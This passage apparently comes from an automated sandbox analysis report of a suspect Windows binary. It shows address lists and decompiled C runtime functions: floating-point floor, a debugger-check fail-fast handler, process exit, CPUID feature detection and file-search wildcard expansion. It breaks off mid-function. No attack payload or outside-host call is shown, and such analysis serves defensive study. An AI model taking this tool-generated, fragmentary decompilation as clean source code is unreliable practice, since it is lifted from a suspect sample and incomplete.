        0x0123c071
        0x0123c045
        0x0123bfd1
        0x0123bfd1
        0x0123bfd3
        0x0123bfd9
        0x0123bfdf
        0x00000000
        0x0123bfdf
        0x0123bfcf
        0x0123bc4d
        0x0123bc4d
        0x0123bc4d
        0x0123bc50
        0x0123bc54
        0x0123bc54
        0x0123bc55
        0x0123bc67
        0x0123bc74
        0x0123bc83
        0x0123bcad
        0x0123bcb2
        0x0123bcb8
        0x0123bcbb
        0x0123bcc1
        0x0123bcc4
        0x0123bd40
        0x0123bd47
        0x0123be0b
        0x0123be11
        0x0123be17
        0x0123be1a
        0x0123be1c
        0x0123bea5
        0x0123be22
        0x0123be22
        0x0123be28
        0x0123be28
        0x0123be2e
        0x0123be34
        0x0123be36
        0x0123be38
        0x0123be38
        0x0123be3e
        0x0123be44
        0x0123be46
        0x0123be4e
        0x0123be4e
        0x0123be54
        0x0123be56
        0x0123be58
        0x0123be5e
        0x0123be60
        0x0123bf77
        0x0123bf79
        0x0123bf7f
        0x0123bf7f
        0x00000000
        0x0123be66
        0x0123be6c
        0x0123be6c
        0x0123be6e
        0x0123be74
        0x0123be77
        0x0123be7e
        0x0123be84
        0x0123be86
        0x0123bead
        0x0123beaf
        0x0123beb1
        0x0123beb3
        0x0123beb9
        0x0123bebf
        0x0123bf59
        0x0123bf59
        0x0123bf5c
        0x00000000
        0x0123bf62
        0x0123bf62
        0x0123bf68
        0x00000000
        0x0123bf68
        0x0123bec5
        0x0123bec5
        0x0123bec5
        0x0123bec8
        0x00000000
        0x00000000
        0x0123beca
        0x0123becc
        0x0123bece
        0x0123bed7
        0x0123bed7
        0x0123bed9
        0x0123bedf
        0x0123bedf
        0x0123beeb
        0x0123bef6
        0x0123bef9
        0x0123bf06
        0x0123bf09
        0x0123bf0a
        0x0123bf0b
        0x0123bf11
        0x0123bf13
        0x0123bf19
        0x0123bf1f
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0123bf21
        0x0123bf21
        0x0123bf21
        0x0123bf23
        0x00000000
        0x00000000
        0x0123bf25
        0x0123bf28
        0x0123bfe2
        0x0123bfe2
        0x0123bfe4
        0x0123bfea
        0x0123bff0
        0x0123bff1
        0x00000000
        0x0123bf2e
        0x0123bf2e
        0x0123bf30
        0x0123bf32
        0x0123bf32
        0x0123bf32
        0x0123bf3a
        0x0123bf3d
        0x0123bf3d
        0x0123bf43
        0x0123bf45
        0x0123bf47
        0x0123bf4e
        0x0123bf54
        0x0123bf56
        0x00000000
        0x0123bf56
        0x00000000
        0x0123bf28
        0x00000000
        0x0123bf21
        0x00000000
        0x0123bec5
        0x0123be88
        0x0123be88
        0x0123be8a
        0x0123be90
        0x0123be97
        0x0123be97
        0x0123be9a
        0x0123be9a
        0x00000000
        0x0123be8a
        0x00000000
        0x0123bf6e
        0x0123bf6e
        0x0123bf6f
        0x0123bf6f
        0x00000000
        0x0123be74
        0x0123bd4d
        0x0123bd4d
        0x0123bd5f
        0x0123bd6e
        0x0123bd73
        0x0123bd76
        0x0123bd78
        0x0123bd94
        0x0123bd97
        0x00000000
        0x0123bd9d
        0x0123bd9d
        0x0123bda4
        0x00000000
        0x0123bdaa
        0x0123bdb0
        0x0123bdb2
        0x0123bdb8
        0x0123bdb8
        0x0123bdba
        0x0123bdba
        0x0123bdbc
        0x0123bdc5
        0x0123bdcc
        0x0123bdcf
        0x0123bdd0
        0x0123bdd2
        0x0123bdd2
        0x00000000
        0x0123bdba
        0x0123bda4
        0x0123bd7a
        0x0123bd7c
        0x0123bd82
        0x0123bd88
        0x0123bd89
        0x00000000
        0x0123bd89
        0x0123bd78
        0x0123bcc6
        0x0123bcc6
        0x0123bccc
        0x0123bcce
        0x0123bce3
        0x0123bce6
        0x00000000
        0x0123bcec
        0x0123bcec
        0x0123bcf3
        0x00000000
        0x0123bcf9
        0x0123bcff
        0x0123bd01
        0x0123bd07
        0x0123bd07
        0x0123bd09
        0x0123bd09
        0x0123bd0b
        0x0123bd14
        0x0123bd1b
        0x0123bd1e
        0x0123bd1f
        0x0123bd21
        0x0123bd21
        0x0123bdda
        0x0123bdda
        0x0123bddc
        0x00000000
        0x0123bde2
        0x0123bde2
        0x0123bde8
        0x0123bdeb
        0x0123bd2e
        0x0123bd35
        0x00000000
        0x0123bdf1
        0x0123bdf3
        0x0123bdf9
        0x0123bdff
        0x0123be00
        0x0123bff7
        0x0123bff7
        0x0123bffe
        0x0123bfff
        0x0123c000
        0x0123c005
        0x0123c008
        0x0123c008
        0x0123bdeb
        0x0123bddc
        0x0123bcf3
        0x0123bcd0
        0x0123bcd0
        0x0123bcd2
        0x0123bcd8
        0x0123bf82
        0x0123bf82
        0x0123bf83
        0x0123bf89
        0x0123bf89
        0x0123bf90
        0x0123bf91
        0x0123bf92
        0x0123bf97
        0x0123bf9a
        0x0123bf9a
        0x0123bf9a
        0x0123bcce
        0x0123bf9c
        0x0123bf9c
        0x0123bf9e
        0x0123c00c
        0x0123c013
        0x0123c013
        0x0123c013
        0x0123c01a
        0x0123c01c
        0x0123c022
        0x0123c023
        0x0123c4cf
        0x0123c4cf
        0x0123c4d0
        0x0123c4d1
        0x0123c4d6
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0123bfa0
        0x0123bfa6
        0x0123bfa6
        0x0123bfac
        0x0123bfac
        0x0123bfb8
        0x00000000
        0x0123bfb8
        0x0123bc47
        0x0123c4d9
        0x0123c4d9
        0x0123c4df
        0x0123c4e1
        0x0123c4e7
        0x0123c4ed
        0x0123c4ef
        0x0123c4f1
        0x0123c4f3
        0x0123c4f3
        0x0123c4f5
        0x0123c4f5
        0x0123c4fe
        0x0123c4ff
        0x0123c503
        0x0123c50a
        0x0123c50d
        0x0123c50e
        0x0123c510
        0x0123c510
        0x0123c514
        0x0123c51a
        0x0123c51c
        0x0123c522
        0x0123c524
        0x0123c52a
        0x0123c52d
        0x0123c540
        0x0123c543
        0x0123c549
        0x0123c55e
        0x0123c563
        0x0123c52f
        0x0123c531
        0x0123c538
        0x0123c538
        0x0123c52d
        0x0123c566
        0x0123c566
        0x0123c576
        0x0123c57f
        0x0123c580
        0x0123c582
        0x0123c619
        0x0123c61b
        0x0123c626
        0x0123c626
        0x0123c628
        0x0123c62b
        0x0123c62d
        0x00000000
        0x0123c61d
        0x0123c623
        0x0123c623
        0x0123c588
        0x0123c588
        0x0123c58e
        0x0123c591
        0x0123c597
        0x0123c59a
        0x0123c5a0
        0x0123c5a2
        0x0123c5a8
        0x0123c5aa
        0x0123c5ac
        0x0123c5ac
        0x0123c5ae
        0x0123c5ae
        0x0123c5bb
        0x0123c5c2
        0x0123c5c5
        0x0123c5c6
        0x0123c5c8
        0x0123c5c9
        0x0123c5c9
        0x0123c5cd
        0x0123c5d3
        0x0123c5d5
        0x0123c5d7
        0x0123c5dd
        0x0123c5e0
        0x0123c5f4
        0x0123c5fa
        0x0123c60f
        0x0123c614
        0x0123c5e2
        0x0123c5e2
        0x0123c5e9
        0x0123c5e9
        0x0123c5e0
        0x0123c5d5
        0x0123c633
        0x0123c633
        0x0123c633
        0x0123c63f
        0x0123c642
        0x0123c648
        0x0123c64a
        0x0123c64c
        0x0123c652
        0x0123c654
        0x0123c654
        0x0123c654
        0x0123c652
        0x0123c659
        0x0123c65a
        0x0123c65c
        0x0123c65e
        0x0123c65e
        0x0123c660
        0x0123c666
        0x0123c66c
        0x0123c66e
        0x0123c674
        0x0123c674
        0x0123c67a
        0x0123c67c
        0x00000000
        0x00000000
        0x0123c682
        0x0123c684
        0x0123c686
        0x0123c686
        0x0123c688
        0x0123c688
        0x0123c698
        0x0123c69f
        0x0123c6a2
        0x0123c6a3
        0x0123c6a5
        0x0123c6a5
        0x0123c6a9
        0x0123c6af
        0x0123c6b1
        0x0123c6b3
        0x0123c6b9
        0x0123c6bc
        0x0123c6cd
        0x0123c6d0
        0x0123c6d6
        0x0123c6eb
        0x0123c6f0
        0x0123c6be
        0x0123c6be
        0x0123c6c5
        0x0123c6c5
        0x0123c6bc
        0x0123c701
        0x0123c710
        0x0123c711
        0x0123c711
        0x0123c713
        0x0123c715
        0x0123c715
        0x0123c71b
        0x0123c71e
        0x0123c720
        0x0123c722
        0x0123c722
        0x0123c725
        0x0123c726
        0x0123c726
        0x0123c72b
        0x0123c72e
        0x0123c732
        0x0123c732
        0x0123c733
        0x0123c735
        0x0123c73b
        0x0123c741
        0x00000000
        0x00000000
        0x00000000
        0x0123c741
        0x0123c674
        0x0123c747
        0x0123c747
        0x00000000
        0x0123c747
        0x0123b4cc
        0x0123b4c3
        0x0123b4ba
        0x0123b471
        0x0123b475
        0x0123b47d
        0x00000000
        0x0123b47f
        0x0123b485
        0x0123b48a
        0x0123c766
        0x0123c766
        0x0123c769
        0x0123c774
        0x0123c79f
        0x0123c7a0
        0x0123c7a1
        0x0123c7a2
        0x0123c7a3
        0x0123c7a4
        0x0123c7a9
        0x0123c7b1
        0x0123c7b6
        0x0123c7bc
        0x0123c7c1
        0x0123c7c2
        0x0123c7c2
        0x0123c7c2
        0x0123c7c8
        0x0123c7c9
        0x0123c7c9
        0x0123c7cc
        0x0123c7d2
        0x00000000
        0x00000000
        0x0123c7d4
        0x0123c7d9
        0x0123c7dc
        0x0123c7de
        0x0123c7e6
        0x0123c7e8
        0x0123c7ea
        0x0123c7ef
        0x0123c7f2
        0x0123c7f8
        0x0123c7fb
        0x0123c7fd
        0x0123c7fd
        0x0123c7fd
        0x0123c7fd
        0x0123c7fb
        0x0123c800
        0x0123c80c
        0x0123c812
        0x0123c81a
        0x0123c81f
        0x0123c820
        0x0123c825
        0x0123c825
        0x0123c825
        0x0123c825
        0x0123c829
        0x0123c829
        0x0123c82c
        0x0123c833
        0x0123c840
        0x0123c776
        0x0123c776
        0x0123c776
        0x0123c77d
        0x0123c77e
        0x0123c77f
        0x0123c780
        0x0123c789
        0x0123c78e
        0x0123c79c
        0x0123c79c
        0x0123c774
        0x0123b47d

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: __floor_pentium4
        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
        • API String ID: 4168288129-2761157908
        • Opcode ID: 2aea068d4710c2634d924e2a00a43278c24332ff2c2204caabacded86f1076e2
        • Instruction ID: c77a8004868ff817b4ebdcedff0ea65abff939db792c4dcff7cc58fc1f94b86a
        • Opcode Fuzzy Hash: 2aea068d4710c2634d924e2a00a43278c24332ff2c2204caabacded86f1076e2
        • Instruction Fuzzy Hash: 09C25CB1E246298FDF29CE28DD407E9B7B5EB88305F1441EAD94DE7241E774AE818F40
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01236B11, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 86%
        			E01236B11(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				void* __ebp;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x1249004; // 0x5a4607f2
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E01232DD0(_t41);
					_pop(_t62);
				}
				E012333D0(_t67,  &_v804, 0, 0x50);
				E012333D0(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x5
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -807
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E01232DD0(_t57);
				}
				return E01232550(_t61, _v8 ^ _t70, _t66, _t68, _t69);
			}







































        0x01236b11
        0x01236b11
        0x01236b11
        0x01236b1c
        0x01236b21
        0x01236b23
        0x01236b2b
        0x01236b2d
        0x01236b30
        0x01236b35
        0x01236b35
        0x01236b41
        0x01236b54
        0x01236b62
        0x01236b68
        0x01236b6e
        0x01236b74
        0x01236b7a
        0x01236b80
        0x01236b86
        0x01236b8c
        0x01236b92
        0x01236b98
        0x01236b9f
        0x01236ba6
        0x01236bad
        0x01236bb4
        0x01236bbb
        0x01236bc2
        0x01236bc3
        0x01236bcc
        0x01236bd2
        0x01236bd2
        0x01236bd5
        0x01236bdb
        0x01236be8
        0x01236bf1
        0x01236bfa
        0x01236c03
        0x01236c11
        0x01236c13
        0x01236c19
        0x01236c28
        0x01236c34
        0x01236c37
        0x01236c3c
        0x01236c4b

        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01236C09
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01236C13
        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 01236C20
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 278211ddfd60ecfe979df9b9f259f36298c7aa6c73223b12292a90642336d044
        • Instruction ID: d8332a0b08abe371c4b1d42f10dd66885609c5752d742f3fc4419cc60c30b3de
        • Opcode Fuzzy Hash: 278211ddfd60ecfe979df9b9f259f36298c7aa6c73223b12292a90642336d044
        • Instruction Fuzzy Hash: 8231D6B491121DEBCB21DF28E88879DBBB8FF58310F5041DAE50CA7250E7749B818F44
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01235C5E, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 100%
        			E01235C5E(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E0123967F(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E01235CE3(_t15, _a4);
				ExitProcess(_a4);
			}








        0x01235c6a
        0x01235c86
        0x01235c86
        0x01235c8f
        0x01235c98

        APIs
        • GetCurrentProcess.KERNEL32(00000000,?,01235C34,00000000,01247C68,0000000C,01235D8B,00000000,00000002,00000000), ref: 01235C7F
        • TerminateProcess.KERNEL32(00000000,?,01235C34,00000000,01247C68,0000000C,01235D8B,00000000,00000002,00000000), ref: 01235C86
        • ExitProcess.KERNEL32 ref: 01235C98
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: 29cbf85a0e274394fb82a90f8b2d6c17a67ae1e448da131232766541970103b3
        • Instruction ID: f69e72c3e4fe4cdca1fb8d08195427051d537fb23b113d55a94dbcb8997be525
        • Opcode Fuzzy Hash: 29cbf85a0e274394fb82a90f8b2d6c17a67ae1e448da131232766541970103b3
        • Instruction Fuzzy Hash: E0E0B675010509EFCF216F55E90CA993FAAFFA4645B005514F9198B121DB39ED82DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01232E9B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E01232E9B(intOrPtr __edx) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t78;
				intOrPtr _t83;
				intOrPtr* _t85;
				signed int _t86;
				signed int _t89;

				_t83 = __edx;
				 *0x1249b04 =  *0x1249b04 & 0x00000000;
				 *0x1249010 =  *0x1249010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x1249010 =  *0x1249010 | 0x00000002;
				 *0x1249b04 = 1;
				_t85 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t85 = 0;
				 *((intOrPtr*)(_t85 + 4)) = 1;
				 *((intOrPtr*)(_t85 + 8)) = 0;
				 *((intOrPtr*)(_t85 + 0xc)) = _t83;
				_v16 = _v48;
				_t51 = 1;
				asm("sbb cl, cl");
				_t78 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t85 = _t51;
				 *((intOrPtr*)(_t85 + 4)) = _t67;
				 *((intOrPtr*)(_t85 + 8)) = _t78;
				 *((intOrPtr*)(_t85 + 0xc)) = _t83;
				if( ~(_v36 ^ 0x49656e69 | _v40 ^ 0x6c65746e | _v44 ^ 0x756e6547) + 1 == 0) {
					L9:
					_t86 =  *0x1249b08; // 0x2
					L10:
					_v32 = _v36;
					_t53 = _v40;
					_v12 = _t53;
					_v28 = _t53;
					if(_v16 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v48;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t83;
						_t60 = _v44;
						_v24 = _t60;
						_t53 = _v12;
						if((_t60 & 0x00000200) != 0) {
							 *0x1249b08 = _t86 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x1249010 =  *0x1249010 | 0x00000004;
						 *0x1249b04 = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t53;
							_v16 = _t83;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x1249010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x1249b04 = 3;
								 *0x1249010 = _t57;
								if((_v24 & 0x00000020) != 0) {
									 *0x1249b04 = 5;
									 *0x1249010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v48 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t89 =  *0x1249b08; // 0x2
					_t86 = _t89 | 0x00000001;
					 *0x1249b08 = _t86;
					goto L10;
				} else {
					goto L9;
				}
			}




























        0x01232e9b
        0x01232e9e
        0x01232eac
        0x01232ebb
        0x01233035
        0x0123303b
        0x0123303b
        0x01232ec1
        0x01232ec7
        0x01232ed2
        0x01232ed8
        0x01232edb
        0x01232edc
        0x01232ee0
        0x01232ee1
        0x01232ee3
        0x01232ee6
        0x01232ee9
        0x01232ef2
        0x01232f13
        0x01232f14
        0x01232f1b
        0x01232f1c
        0x01232f1d
        0x01232f21
        0x01232f22
        0x01232f24
        0x01232f27
        0x01232f2a
        0x01232f2d
        0x01232f72
        0x01232f72
        0x01232f78
        0x01232f7f
        0x01232f82
        0x01232f85
        0x01232f88
        0x01232f8b
        0x01232f8f
        0x01232f92
        0x01232f93
        0x01232f98
        0x01232f9b
        0x01232f9d
        0x01232fa0
        0x01232fa3
        0x01232fa6
        0x01232fae
        0x01232fb1
        0x01232fb4
        0x01232fb9
        0x01232fb9
        0x01232fb4
        0x01232fc6
        0x01232fc8
        0x01232fcf
        0x01232fde
        0x01232fe9
        0x01232fec
        0x01232fef
        0x01233000
        0x01233006
        0x0123300b
        0x0123300e
        0x0123301c
        0x01233021
        0x01233026
        0x01233030
        0x01233030
        0x01233021
        0x01233000
        0x01232fde
        0x00000000
        0x01232fc6
        0x01232f32
        0x01232f3c
        0x01232f61
        0x01232f67
        0x01232f6a
        0x00000000
        0x00000000
        0x00000000
        0x00000000

        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01232EB4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-3916222277
        • Opcode ID: 03ecaf900306e758db9f6a66337277afed39a0e478067627e04b67bcee395c54
        • Instruction ID: 840e370c91c4dd0bf2713d6efc7046f5a6fa3f09a70c00dd8110d5bcc067b396
        • Opcode Fuzzy Hash: 03ecaf900306e758db9f6a66337277afed39a0e478067627e04b67bcee395c54
        • Instruction Fuzzy Hash: DD51A1B19102068FEB25CFADE48A7ABBBF4FB48314F10852AD505E7284E3759A80CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 012385AB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
        Download Yara Rule
        C-Code - Quality: 57%
        			E012385AB(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				char _v288;
				void _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				void* _t80;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t106;
				void* _t109;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				void* _t113;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_t104 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t104) {
					_t5 = _t104 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t110 = E012365F3(_t85, _t78, 1);
					_t87 = _t109;
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t104;
						_t40 = E0123CF9B(_t87, _t110 + _t104, _t78, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E012387EA(_a16, _t101, __eflags, _t110);
							E012364CE(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t104);
						_t75 = E0123CF9B(_t87, _t110, _t78, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E01236CEB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0x1249004; // 0x5a4607f2
							_v48 = _t43 ^ _t117;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t110);
							_t111 = _v28;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E0123CFF0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E012333D0(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t79, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v288 - 0x2e;
										if(_v288 != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E012385AB(_t93,  &_v288, _t79, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 =  *0x12420e0(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0123CB50(_t79, _t102 + _t96 * 4, _t65 - _t96, 4, E01238403);
									}
								} else {
									_push(_t55);
									_t57 = E012385AB(_t90, _t79, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									 *0x12420d8(_t112);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
